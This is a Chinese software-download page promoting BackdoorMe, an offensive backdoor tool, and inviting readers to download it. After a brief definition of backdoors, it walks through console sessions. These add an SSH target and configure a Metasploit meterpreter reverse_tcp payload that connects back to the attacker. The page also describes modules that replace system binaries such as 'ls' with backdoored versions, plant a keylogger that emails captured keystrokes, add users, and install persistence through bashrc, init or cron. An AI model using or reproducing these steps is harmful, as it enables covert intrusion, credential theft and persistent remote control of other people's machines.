BackdoorMe是一款功能強(qiáng)大的自動(dòng)化后門工具,用于滲透測(cè)試!很明顯,軟件是帶有攻擊性的,嚴(yán)禁用于非法用途。該工具目前使用了metasploit接口,以后會(huì)慢慢淡化接口,增強(qiáng)自身特色。需要的朋友下!
什么是后門程序
后門程序一般是指那些繞過安全性控制而獲取對(duì)程序或系統(tǒng)訪問權(quán)的程序方法。在軟件的開發(fā)階段,程序員常常會(huì)在軟件內(nèi)創(chuàng)建后門程序以便可以修改程序設(shè)計(jì)中的缺陷。但是,如果這些后門被其他人知道,或是在發(fā)布軟件之前沒有刪除后門程序,那么它就成了安全風(fēng)險(xiǎn),容易被黑客當(dāng)成漏洞進(jìn)行攻擊。
后門程序又稱特洛依木馬,其用途在于潛伏在電腦中,從事搜集信息或便于黑客進(jìn)入的動(dòng)作。后門程序和電腦病毒最大的差別,在于后門程序不一定有自我復(fù)制的動(dòng)作,也就是后門程序不一定會(huì)“感染”其它電腦。
BackdoorMe有哪些功能模塊
其內(nèi)置了Backdoors(后門)、Modules(模塊)和Auxiliaries(輔助模塊)
Bash
Bash2 (依賴更多)
Metasploit
Netcat
Netcat-traditional
Perl
Php (非WEB后門,但使用了WEB模塊)
Pupy
Python
Web (php –WEB后門)
BackdoorMe怎么用
在安裝backdoorme之前,請(qǐng)先確保您準(zhǔn)備好了所有的依賴包。
$ python dependencies.py
啟動(dòng)backdoorme:
$ python master.py ___ __ __ __ ___ / _ )___ _____/ /_____/ /__ ___ ____/ |/ /__ / _ / _ `/ __/ '_/ _ / _ \/ _ \/ __/ /|_/ / -_) /____/\_,_/\__/_/\_\\_,_/\___/\___/_/ /_/ /_/\__/ Welcome to BackdoorMe, a powerful backdooring utility. Type "help" to see the list of available commands. Type "addtarget" to set a target, and "open" to open an SSH connection to that target. Using local IP of 10.1.0.1. >>
加入target:
>> addtarget Target Hostname: 10.1.0.2 Username: victim Password: password123 + Target 1 Set! >>
Backdoor
請(qǐng)輸入“use”關(guān)鍵詞來使用后門:
>> use metasploit + Using current target 1. + Using Metasploit backdoor... (msf) >>
從從這兒開始,你可以設(shè)置后門相關(guān)選項(xiàng),運(yùn)行“show options”或者“help”,來查看需要配置的參數(shù)。這里設(shè)置選項(xiàng),用“set”就行了。
(msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name initd name of the backdoor False format elf format to write the backdoor to True lhost 10.1.0.1 local IP to connect back to True encoder none encoder to use for the backdoor False lport 4444 local port to connect back on True payload linux/x86/meterpreter/reverse_tcp payload to deploy in backdoor True (msf) >> set name apache + name => apache (msf) >> show options Backdoor options: Option Value Description Required ------ ----- ----------- -------- name apache name of the backdoor False ...
Modules
每個(gè)后門在添加了額外的模塊后,會(huì)變得更加有效。要添加一個(gè)模塊,只需要使用“add”。
(msf) >> add poison + Poison module added
每個(gè)模塊都有額外的參數(shù)可以定制,如果運(yùn)行了“help”,你可以看到或者設(shè)置任何附加選項(xiàng)。
(msf) >> help ... Poison module options: Option Value Description Required ------ ----- ----------- -------- name ls name of command to poison False location /bin where to put poisoned files into False
現(xiàn)在能啟用的模塊包括:
Poison:
感染目標(biāo)計(jì)算機(jī)上的可執(zhí)行文件,它會(huì)編譯一個(gè)exe,把原有的程序變?yōu)楹箝T。
比如,如果這個(gè)模塊感染了“l(fā)s”,它會(huì)進(jìn)行編譯,然后把正常“l(fā)s”給變成后門“l(fā)s”,這樣一來用戶可以更頻繁地運(yùn)行“l(fā)s”后門。
Cron:
作用和做法同上。
Web:
啟動(dòng)WEB服務(wù),放置存有后門的WEB頁面,訪問該網(wǎng)頁則監(jiān)聽開始。
Keylogger:
植入鍵盤記錄器,在配置時(shí)可以配入點(diǎn)自己郵件,每小時(shí)會(huì)收到結(jié)果。
User:
添加新用戶。
Startup:
可以將后門植入bashrc或者init文件。
Auxiliaries
為了更加隱蔽,某些用戶可能會(huì)希望在目標(biāo)機(jī) 器上使用特定的服務(wù)。應(yīng)用auxiliary模塊,使用“apply”即可。
>> apply user + User Auxiliary Module added.
Auxiliaries支持modules的使用,所有它們能更加隱蔽和頻繁的運(yùn)行。
>> (user) add startup + Startup Module added.
現(xiàn)有啟用的auxiliaries包括:
User
在目標(biāo)機(jī)器添加新用戶。
Targets
Backdoorme支持同時(shí)操作多個(gè)目標(biāo),使用數(shù)字序號(hào)切換即可。比如,使用“use metasploit 2”命令,可以在目標(biāo)“2”上使用msf。
- PC官方版
- 安卓官方手機(jī)版
- IOS官方手機(jī)版